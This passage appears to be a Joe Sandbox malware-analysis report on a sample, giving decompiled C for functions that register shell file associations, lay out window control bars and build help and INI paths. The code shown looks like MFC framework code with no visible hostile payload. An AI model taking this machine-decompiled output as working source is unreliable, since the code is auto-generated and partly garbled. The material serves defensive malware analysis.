                  										__eflags = _t182;
                  										if(_t182 == 0) {
                  											L16:
                  											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  											_t288 = _t334 - 0x10;
                  											goto L13;
                  										}
                  										__eflags = _t247;
                  										if(_t247 == 0) {
                  											_push(" \"%1\"");
                  											_t294 = _t338 - 0x24;
                  											L28:
                  											E00405EC1(_t294);
                  											L29:
                  											_push("command");
                  											E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  											_t328 =  *((intOrPtr*)(_t338 - 0x24));
                  											_t339 = _t339 + 0x10;
                  											_t192 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t328, 0); // executed
                  											__eflags = _t192;
                  											if(_t192 != 0) {
                  												__eflags = _t247;
                  												_t248 =  *((intOrPtr*)(_t338 - 0x28));
                  												if(_t247 == 0) {
                  													L34:
                  													_t325 = _t338 - 0x18;
                  													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x44)))) + 0x64))(_t338 - 0x18, 4);
                  													_t195 =  *((intOrPtr*)(_t338 - 0x18));
                  													__eflags =  *((intOrPtr*)(_t195 - 0xc));
                  													if( *((intOrPtr*)(_t195 - 0xc)) == 0) {
                  														L42:
                  														E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  														E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  														E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  														E004010B0(_t334 - 0x10, _t325);
                  														__eflags =  *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0;
                  														E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
                  														_t276 = _t248 - 0x10;
                  														L43:
                  														E004010B0(_t276, _t325);
                  														_t277 = _t328 - 0x10;
                  														goto L44;
                  													}
                  													 *((intOrPtr*)(_t338 - 0x44)) = 0x208;
                  													_t197 = E004014F0(_t338 - 0x14, 0x208);
                  													_push(_t338 - 0x44);
                  													_push(_t197);
                  													_push( *((intOrPtr*)(_t338 - 0x18)));
                  													_push(0x80000000); // executed
                  													_t198 = E00420018(_t248, _t325, _t328, _t334, __eflags); // executed
                  													 *((intOrPtr*)(_t338 - 0x48)) = _t198;
                  													E0040A356(_t338 - 0x14, 0xffffffff);
                  													__eflags =  *((intOrPtr*)(_t338 - 0x48));
                  													if( *((intOrPtr*)(_t338 - 0x48)) != 0) {
                  														L38:
                  														_t200 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x18)),  *((intOrPtr*)(_t338 - 0x10)), 0); // executed
                  														__eflags = _t200;
                  														if(_t200 != 0) {
                  															__eflags =  *((intOrPtr*)(_t338 + 8));
                  															if( *((intOrPtr*)(_t338 + 8)) != 0) {
                  																E004015A0(_t338 - 0x14, "%s\\ShellNew",  *((intOrPtr*)(_t338 - 0x18)));
                  																_t339 = _t339 + 0xc;
                  																E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), 0x44f0f5, "NullFile"); // executed
                  															}
                  														}
                  														goto L42;
                  													}
                  													_t204 =  *((intOrPtr*)(_t338 - 0x14));
                  													__eflags =  *((intOrPtr*)(_t204 - 0xc));
                  													if( *((intOrPtr*)(_t204 - 0xc)) == 0) {
                  														goto L38;
                  													}
                  													_t205 = E00409F00(_t338 - 0x14, _t325,  *((intOrPtr*)(_t338 - 0x10)));
                  													__eflags = _t205;
                  													if(_t205 != 0) {
                  														goto L42;
                  													}
                  													goto L38;
                  												}
                  												_push("command");
                  												E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  												_t339 = _t339 + 0x10;
                  												_t208 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t248, 0); // executed
                  												__eflags = _t208;
                  												if(_t208 == 0) {
                  													goto L42;
                  												}
                  												_push("command");
                  												E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  												_t339 = _t339 + 0x10;
                  												_t211 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)),  *((intOrPtr*)(_t338 - 0x20)), 0); // executed
                  												__eflags = _t211;
                  												if(_t211 == 0) {
                  													goto L42;
                  												}
                  												goto L34;
                  											}
                  											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  											E004010B0(_t334 - 0x10, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
                  											_t276 =  *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0;
                  											goto L43;
                  										}
                  										_push(_t329);
                  										E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  										_t339 = _t339 + 0x10;
                  										_t219 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[print(\"%1\")]", 0); // executed
                  										__eflags = _t219;
                  										if(_t219 == 0) {
                  											goto L16;
                  										}
                  										_push(_t329);
                  										E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  										_t339 = _t339 + 0x10;
                  										_t222 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0); // executed
                  										__eflags = _t222;
                  										if(_t222 == 0) {
                  											goto L16;
                  										}
                  										_t330 = " /dde";
                  										E00405EC1(_t338 - 0x24, _t330);
                  										E00405EC1(_t338 - 0x28, _t330);
                  										_push(_t330);
                  										L21:
                  										_t294 = _t338 - 0x20;
                  										goto L28;
                  									}
                  									_t225 =  *((intOrPtr*)(_t338 - 0x14));
                  									__eflags =  *((intOrPtr*)(_t225 - 0xc));
                  									if( *((intOrPtr*)(_t225 - 0xc)) == 0) {
                  										goto L22;
                  									}
                  									E00405EC1(_t338 - 0x24, " \"%1\"");
                  									__eflags = _t247;
                  									if(_t247 == 0) {
                  										goto L29;
                  									}
                  									E00405EC1(_t338 - 0x28, " /p \"%1\"");
                  									_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
                  									goto L21;
                  								}
                  								E004015A0(_t338 - 0x14, "%s\\DefaultIcon",  *((intOrPtr*)(_t338 - 0x10)));
                  								_t339 = _t339 + 0xc;
                  								_t230 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t334, 0); // executed
                  								__eflags = _t230;
                  								if(_t230 != 0) {
                  									goto L17;
                  								}
                  								goto L16;
                  							} else {
                  								E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  								_t288 =  *((intOrPtr*)(_t338 - 0x38)) + 0xfffffff0;
                  								L13:
                  								E004010B0(_t288, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0, _t325);
                  								_t277 =  *((intOrPtr*)(_t338 - 0x24)) + 0xfffffff0;
                  								goto L44;
                  							}
                  						}
                  						L44:
                  						 *(_t338 - 4) = 1;
                  						E004010B0(_t277, _t325);
                  						 *(_t338 - 0x30) =  *(_t338 - 0x30) + 1;
                  					} while ( *((intOrPtr*)(_t338 - 0x3c)) != 0);
                  					goto L45;
                  				}
                  			}










































                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427AD4
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • ExtractIconA.SHELL32(?,?,00000001), ref: 00427B90
                  • DestroyCursor.USER32(00000000), ref: 00427BB1
                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                    • Part of subcall function 00427206: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                    • Part of subcall function 00427206: RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Namelstrlen$CloseCursorDestroyExtractFileH_prolog3IconModulePathShortValue
                  • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                  • API String ID: 519677498-4043335175
                  • Opcode ID: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction ID: 9143f19bdfc8b7c6ecc2443052c1ae3c958a6745bc1d14e11510287793223560
                  • Opcode Fuzzy Hash: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction Fuzzy Hash: FFE17D31A04119ABCB14EBA5DC92FBFB774AF14318F64022AF521772E2DB385944CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (function 00413B62; nodes marked Executed / Not Executed)
                  C-Code - Quality: 88%
                  			E00413B62(intOrPtr* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, signed int _a12) {
                  				intOrPtr* _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				intOrPtr* _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				signed int _v36;
                  				void* _v40;
                  				signed int _v44;
                  				struct tagRECT _v64;
                  				struct tagRECT _v80;
                  				struct tagRECT _v96;
                  				signed int _v128;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t181;
                  				intOrPtr _t185;
                  				signed int _t187;
                  				intOrPtr _t192;
                  				intOrPtr _t193;
                  				signed int _t198;
                  				intOrPtr* _t199;
                  				signed int _t200;
                  				signed int _t202;
                  				signed int _t203;
                  				signed int _t205;
                  				signed int _t206;
                  				signed int _t211;
                  				signed int _t215;
                  				intOrPtr _t223;
                  				intOrPtr _t224;
                  				signed int _t229;
                  				signed int _t230;
                  				intOrPtr _t231;
                  				intOrPtr _t235;
                  				signed int* _t238;
                  				signed int _t240;
                  				signed int _t245;
                  				int _t246;
                  				int _t249;
                  				long _t252;
                  				intOrPtr _t253;
                  				signed int _t259;
                  				signed int* _t267;
                  				signed int _t268;
                  				void* _t275;
                  				intOrPtr* _t285;
                  				signed int _t286;
                  				signed int _t287;
                  				signed int _t288;
                  				signed int _t295;
                  				signed int* _t306;
                  				signed int _t313;
                  				signed int _t321;
                  				intOrPtr _t322;
                  				intOrPtr _t323;
                  				intOrPtr _t336;
                  				void* _t338;
                  				intOrPtr* _t340;
                  				intOrPtr* _t341;
                  				signed int _t349;
                  				signed int _t350;
                  				intOrPtr* _t351;
                  				signed int _t354;
                  
                  				_t291 = __ecx;
                  				_t285 = __ecx;
                  				_v8 = __ecx;
                  				_t357 = __ecx;
                  				if(__ecx != 0) {
                  					L2:
                  					E00421213(_a4, _a8, _a12);
                  					_t348 = _t285 + 0xb4;
                  					if(IsRectEmpty(_t285 + 0xb4) != 0) {
                  						_t291 = _t285;
                  						_t181 = E0040F898(_t285);
                  						__eflags = _t181;
                  						if(__eflags == 0) {
                  							goto L1;
                  						} else {
                  							GetClientRect( *(_t181 + 0x20),  &_v80);
                  							_t185 = _v80.right - _v80.left;
                  							_t295 = _v80.bottom - _v80.top;
                  							__eflags = _t295;
                  							goto L6;
                  						}
                  					} else {
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *((intOrPtr*)( *_t285 + 0x148))( &_v64, _a12);
                  						_t185 = _v64.right - _v64.left;
                  						_t295 = _v64.bottom - _v64.top;
                  						L6:
                  						_v28 = _t295;
                  						_v32 = _t185;
                  						if( *((intOrPtr*)(_t285 + 0xb0)) == 0) {
                  							_v128 = BeginDeferWindowPos( *(_t285 + 0xa4));
                  						} else {
                  							_v128 = _v128 & 0x00000000;
                  						}
                  						_t286 =  *0x466520; // 0x2
                  						_t349 =  *0x466524; // 0x2
                  						_t340 = _v8;
                  						_t187 = 0;
                  						_t350 =  ~_t349;
                  						_t287 =  ~_t286;
                  						_v44 = _t350;
                  						_v16 = 0;
                  						_v20 = 0;
                  						_v12 = 0;
                  						if( *((intOrPtr*)(_t340 + 0xa4)) <= 0) {
                  							L76:
                  							_t351 = _a4;
                  							if( *((intOrPtr*)(_t340 + 0xb0)) == _t187 && _v128 != _t187) {
                  								EndDeferWindowPos(_v128); // executed
                  							}
                  							SetRectEmpty( &_v96);
                  							 *((intOrPtr*)( *_t340 + 0x148))( &_v96, _a12);
                  							if(_a8 == 0 || _a12 == 0) {
                  								_t192 =  *_t351;
                  								if(_t192 != 0) {
                  									 *_t351 = _v96.left - _v96.right + _t192;
                  								}
                  							}
                  							if(_a8 == 0 || _a12 != 0) {
                  								_t193 =  *((intOrPtr*)(_t351 + 4));
                  								if(_t193 != 0) {
                  									 *((intOrPtr*)(_t351 + 4)) = _v96.top - _v96.bottom + _t193;
                  								}
                  							}
                  							return _t351;
                  						} else {
                  							do {
                  								_t341 = E00413638(_v8, _v12);
                  								_v24 = _t341;
                  								_t198 =  *(E0040B917(_v8 + 0x9c, _v12));
                  								if(_t341 == 0) {
                  									__eflags = _t198;
                  									if(_t198 != 0) {
                  										goto L74;
                  									}
                  									L61:
                  									__eflags = _v16;
                  									if(_v16 != 0) {
                  										__eflags = _a12;
                  										_t200 = _v16;
                  										_t306 = _a4;
                  										if(_a12 == 0) {
                  											_t287 = _t287 + _t200 -  *0x466520;
                  											_t202 =  *_t306;
                  											__eflags = _t202 - _t287;
                  											if(_t202 <= _t287) {
                  												_t202 = _t287;
                  											}
                  											 *_t306 = _t202;
                  											_t203 = _t306[1];
                  											__eflags = _t203 - _t350;
                  											if(_t203 <= _t350) {
                  												_t203 = _t350;
                  											}
                  											_t306[1] = _t203;
                  											_t354 =  *0x466524; // 0x2
                  											_t350 =  ~_t354;
                  											_v44 = _t350;
                  										} else {
                  											_t350 = _t350 + _t200 -  *0x466524;
                  											_t205 =  *_t306;
                  											__eflags = _t205 - _t287;
                  											_v44 = _t350;
                  											if(_t205 > _t287) {
                  												_t287 = _t205;
                  											}
                  											_t206 = _t306[1];
                  											__eflags = _t206 - _t350;
                  											 *_t306 = _t287;
                  											if(_t206 <= _t350) {
                  												_t206 = _t350;
                  											}
                  											_t306[1] = _t206;
                  											_t288 =  *0x466520; // 0x2
                  											_t287 =  ~_t288;
                  										}
                  										_t154 =  &_v16;
                  										 *_t154 = _v16 & 0x00000000;
                  										__eflags =  *_t154;
                  									}
                  									goto L74;
                  								}
                  								if( *((intOrPtr*)( *_t341 + 0x168))() == 0) {
                  									L58:
                  									__eflags = _v20;
                  									if(_v20 != 0) {
                  										goto L74;
                  									}
                  									L59:
                  									 *((intOrPtr*)( *_t341 + 0x16c))( &_v128);
                  									goto L74;
                  								}
                  								_t211 =  *(_t341 + 0x84);
                  								if((_t211 & 0x00000004) == 0 || (_t211 & 0x00000001) == 0) {
                  									asm("sbb eax, eax");
                  									_t215 = ( ~(_t211 & 0x0000a000) & 0xfffffffa) + 0x10;
                  									__eflags = _t215;
                  								} else {
                  									_t215 = 6;
                  								}
                  								 *((intOrPtr*)( *_t341 + 0x140))( &_v40, 0xffffffff, _t215);
                  								E0041335B( &_v64, _t287, _t350, _v40, _v36);
                  								GetWindowRect( *(_t341 + 0x20),  &_v80);
                  								E00422BFB(_v8,  &_v80);
                  								if(_a12 == 0) {
                  									_t223 = _v80.top;
                  									__eflags = _t223 - _v64.top;
                  									if(_t223 > _v64.top) {
                  										_t322 = _v8;
                  										__eflags =  *(_t322 + 0x98);
                  										if( *(_t322 + 0x98) == 0) {
                  											_t249 = _t223 - _v64.top;
                  											__eflags = _t249;
                  											OffsetRect( &_v64, 0, _t249);
                  										}
                  									}
                  									_t224 = _v64.bottom;
                  									_t313 = _v28;
                  									__eflags = _t224 - _t313;
                  									if(_t224 > _t313) {
                  										_t336 = _v8;
                  										__eflags =  *(_t336 + 0x98);
                  										if( *(_t336 + 0x98) == 0) {
                  											_t321 = _t313 - _t224 - _v64.top -  *0x466524;
                  											__eflags = _t321 - _t350;
                  											_t245 = _t321;
                  											if(_t321 <= _t350) {
                  												_t245 = _t350;
                  											}
                  											_t246 = _t245 - _v64.top;
                  											__eflags = _t246;
                  											OffsetRect( &_v64, 0, _t246);
                  										}
                  									}
                  									__eflags = _v20;
                  									if(_v20 == 0) {
                  										__eflags = _v64.top - _v28 -  *0x466524;
                  										if(_v64.top < _v28 -  *0x466524) {
                  											goto L51;
                  										}
                  										__eflags = _v12;
                  										if(_v12 <= 0) {
                  											goto L51;
                  										}
                  										_t238 = E0040B917(_v8 + 0x9c, _v12 - 1);
                  										__eflags =  *_t238;
                  										if( *_t238 != 0) {
                  											goto L37;
                  										}
                  										goto L51;
                  									} else {
                  										_t240 =  *0x466524; // 0x2
                  										_v20 = _v20 & 0x00000000;
                  										OffsetRect( &_v64, 0,  ~(_v64.top + _t240));
                  										L51:
                  										_t229 = EqualRect( &_v64,  &_v80);
                  										__eflags = _t229;
                  										if(_t229 == 0) {
                  											_t231 = _v8;
                  											__eflags =  *(_t231 + 0xb0);
                  											if( *(_t231 + 0xb0) == 0) {
                  												__eflags =  *(_t341 + 0x84) & 0x00000001;
                  												if(( *(_t341 + 0x84) & 0x00000001) == 0) {
                  													_t235 = _v24;
                  													__eflags =  *((intOrPtr*)(_t235 + 0x94)) + 0x94;
                  													asm("movsd");
                  													asm("movsd");
                  													asm("movsd");
                  													asm("movsd");
                  													_t341 = _t235;
                  												}
                  											}
                  											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
                  										}
                  										_t230 = _v40;
                  										_t350 = _v64.top -  *0x466524 + _v36;
                  										__eflags = _v16 - _t230;
                  										_v44 = _t350;
                  										if(_v16 > _t230) {
                  											goto L59;
                  										} else {
                  											_v16 = _t230;
                  											goto L58;
                  										}
                  									}
                  								} else {
                  									_t252 = _v80.left;
                  									if(_t252 > _v64.left &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										OffsetRect( &_v64, _t252 - _v64.left, 0);
                  									}
                  									_t253 = _v64.right;
                  									_t323 = _v32;
                  									if(_t253 > _t323 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										OffsetRect( &_v64, _t275 - _v64.left, 0);
                  									}
                  									if(_v20 == 0) {
                  										__eflags = _v64.left - _v32 -  *0x466520;
                  										if(_v64.left < _v32 -  *0x466520) {
                  											goto L27;
                  										}
                  										__eflags = _v12;
                  										if(_v12 <= 0) {
                  											goto L27;
                  										}
                  										_t267 = E0040B917(_v8 + 0x9c, _v12 - 1);
                  										__eflags =  *_t267;
                  										if( *_t267 == 0) {
                  											goto L27;
                  										}
                  										L37:
                  										_push(1);
                  										_push(0);
                  										E004260F4(_t287, _v8 + 0x9c, 1, _v12);
                  										_v20 = 1;
                  										goto L61;
                  									} else {
                  										_t268 =  *0x466520; // 0x2
                  										_v20 = _v20 & 0x00000000;
                  										OffsetRect( &_v64,  ~(_t268 + _v64.left), 0);
                  										L27:
                  										if(EqualRect( &_v64,  &_v80) == 0) {
                  											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t341 + 0x84) & 0x00000001) == 0) {
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t350 = _v44;
                  												_t341 = _v24;
                  											}
                  											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
                  										}
                  										_t259 = _v36;
                  										_t287 = _v40 -  *0x466520 + _v64.left;
                  										if(_v16 <= _t259) {
                  											_v16 = _t259;
                  										}
                  										goto L59;
                  									}
                  								}
                  								L74:
                  								_v12 = _v12 + 1;
                  								_t199 = _v8;
                  							} while (_v12 <  *((intOrPtr*)(_t199 + 0xa4)));
                  							_t340 = _t199;
                  							_t187 = 0;
                  							goto L76;
                  						}
                  					}
                  				}
                  				L1:
                  				E00406436(_t285, _t291, _t338, _t348, _t357);
                  				goto L2;
                  			}


                  APIs
                  • IsRectEmpty.USER32 ref: 00413B90
                  • GetWindowRect.USER32 ref: 00413CBC
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClientRect.USER32 ref: 00413BD2
                  • BeginDeferWindowPos.USER32 ref: 00413BFF
                  • OffsetRect.USER32(?,?,00000000), ref: 00413CF6
                  • OffsetRect.USER32(?,?,00000000), ref: 00413D2F
                  • OffsetRect.USER32(?,00000002,00000000), ref: 00413D56
                  • EqualRect.USER32 ref: 00413D64
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E3F
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E78
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E9B
                  • EqualRect.USER32 ref: 00413EDB
                  • KiUserCallbackDispatcher.NTDLL(?), ref: 00413FEC
                  • SetRectEmpty.USER32(?), ref: 00413FF6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Offset$EmptyEqualWindow$BeginCallbackClientDeferDispatcherException@8H_prolog3ThrowUser
                  • String ID:
                  • API String ID: 3576052098-0
                  • Opcode ID: d683042e509441e1f4c974bac9cc01ab42b27de317ac2ed517fd49ba6fe9a68c
                  • Instruction ID: 5a4b077b88add1b12872ffce2bc9f70bb062d40a4a35f0a38eb10edef1dfd08d
                  • Opcode Fuzzy Hash: d683042e509441e1f4c974bac9cc01ab42b27de317ac2ed517fd49ba6fe9a68c
                  • Instruction Fuzzy Hash: 48022831E00209EFDF14CFA8D984BEEBBB5BF08306F14416AE515E7251D778AA81CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 303 42fe1c-42fe61 call 41f363 GetModuleFileNameA 306 42fe63-42fe65 303->306 307 42fe67 call 42282a 303->307 306->307 308 42fe6c-42fe81 PathFindExtensionA 306->308 307->308 310 42fe83 call 42282a 308->310 311 42fe88-42fea7 call 42fddc 308->311 310->311 315 42fea9 call 42282a 311->315 316 42feae-42feb2 311->316 315->316 317 42feb4-42fec6 call 433ccf 316->317 318 42fecd-42fed2 316->318 317->318 329 42fec8 call 4063fe 317->329 321 42ff07-42ff0e 318->321 322 42fed4-42feec call 41b239 318->322 325 42ff10-42ff1d 321->325 326 42ff5b-42ff5f 321->326 336 42fef7 322->336 337 42feee-42fef5 322->337 327 42ff26 325->327 328 42ff1f-42ff24 325->328 331 42ff93-42ffa1 call 430650 326->331 332 42ff61-42ff8d call 4317a1 call 4048c1 call 433ccf 326->332 333 42ff2b-42ff4c call 414fee call 433ccf 327->333 328->333 329->318 332->329 332->331 333->329 351 42ff52-42ff58 333->351 341 42fefa-42ff05 call 433ccf 336->341 337->341 341->321 341->329 351->326
                  C-Code - Quality: 62%
                  			E0042FE1C(void* __ecx, void* __edx, void* __eflags) {
                  				signed int _v8;
                  				char _v268;
                  				char _v528;
                  				char _v784;
                  				char* _v788;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t35;
                  				long _t41;
                  				char* _t44;
                  				void* _t57;
                  				intOrPtr _t60;
                  				intOrPtr _t65;
                  				void* _t68;
                  				void* _t70;
                  				void* _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t77;
                  				void* _t79;
                  				void* _t80;
                  				signed int _t84;
                  				void* _t85;
                  
                  				_t74 = __edx;
                  				_t71 = __ecx;
                  				_t82 = _t84;
                  				_t85 = _t84 - 0x310;
                  				_t35 =  *0x463404; // 0x18eab29f
                  				_v8 = _t35 ^ _t84;
                  				_push(_t68);
                  				_push(_t75);
                  				_t79 = __ecx;
                  				_t76 = E0041F363(_t68, _t75, __ecx, __eflags);
                  				 *(_t76 + 8) =  *(_t79 + 0x44);
                  				 *(_t76 + 0xc) =  *(_t79 + 0x44);
                  				_t41 = GetModuleFileNameA( *(_t79 + 0x44),  &_v268, 0x104);
                  				if(_t41 == 0 || _t41 == 0x104) {
                  					E0042282A(_t71);
                  				}
                  				_t44 = PathFindExtensionA( &_v268); // executed
                  				_v788 = _t44;
                  				if(_t44 == 0) {
                  					E0042282A(_t71);
                  				}
                  				 *_v788 = 0;
                  				if(E0042FDDC( &_v268,  &_v528, 0x104) != 0) {
                  					E0042282A(_t71);
                  				}
                  				if( *((intOrPtr*)(_t79 + 0x60)) == 0) {
                  					_t65 = E00433CCF( &_v528);
                  					_pop(_t71);
                  					 *((intOrPtr*)(_t79 + 0x60)) = _t65;
                  					_t93 = _t65;
                  					if(_t65 == 0) {
                  						L10:
                  						E004063FE(0x104, _t71, _t76, _t79, _t93);
                  					}
                  				}
                  				_t49 =  *((intOrPtr*)(_t79 + 0x50));
                  				if(_t49 == 0) {
                  					if(E0041B239(0x104, _t71, _t76, _t79, 0xe000,  &_v784, 0x100) == 0) {
                  						_push( *((intOrPtr*)(_t79 + 0x60)));
                  					} else {
                  						_push( &_v784);
                  					}
                  					_t49 = E00433CCF();
                  					 *((intOrPtr*)(_t79 + 0x50)) = _t49;
                  					_pop(_t71);
                  					if(_t49 == 0) {
                  						goto L10;
                  					}
                  				}
                  				 *((intOrPtr*)(_t76 + 0x10)) = _t49;
                  				if( *((intOrPtr*)(_t79 + 0x64)) == 0) {
                  					_t57 =  &_v8 - _v788;
                  					if( *((intOrPtr*)(_t79 + 0x6c)) != 1) {
                  						_push(".HLP");
                  					} else {
                  						_push(".CHM");
                  					}
                  					_push(_t57);
                  					_push(_v788);
                  					E00414FEE(0x104, _t74, _t76, _t79);
                  					_t85 = _t85 + 0xc;
                  					_t60 = E00433CCF( &_v268);
                  					_pop(_t71);
                  					 *((intOrPtr*)(_t79 + 0x64)) = _t60;
                  					if(_t60 == 0) {
                  						goto L10;
                  					} else {
                  						_t49 = _v788;
                  						 *_v788 = 0;
                  					}
                  				}
                  				if( *((intOrPtr*)(_t79 + 0x68)) == 0) {
                  					E004048C1(0x104, _t71, _t76, _t79, E004317A1(_t74,  &_v528, 0x104, ".INI"));
                  					_t49 = E00433CCF( &_v528);
                  					_t85 = _t85 + 0x14;
                  					 *((intOrPtr*)(_t79 + 0x68)) = _t49;
                  					if(_t49 == 0) {
                  						goto L10;
                  					}
                  				}
                  				_pop(_t77);
                  				_pop(_t80);
                  				_pop(_t70);
                  				return E00430650(_t49, _t70, _v8 ^ _t82, _t74, _t77, _t80);
                  			}


                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                  • String ID: .CHM$.HLP$.INI
                  • API String ID: 1153805871-4017452060
                  • Opcode ID: 5a2cfcf0a266f3ba9807a91fb32b2f27e91d7bb497108997dc917048d7d32576
                  • Instruction ID: ddaf0331e0f280528f6596423df915eadd577d6b01de0391df7aa35ddabab8c3
                  • Opcode Fuzzy Hash: 5a2cfcf0a266f3ba9807a91fb32b2f27e91d7bb497108997dc917048d7d32576
                  • Instruction Fuzzy Hash: 6E417571A003199BDB21EF65DD45B9BB7FCAF08305F90097BE445D2252EB78DA84CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
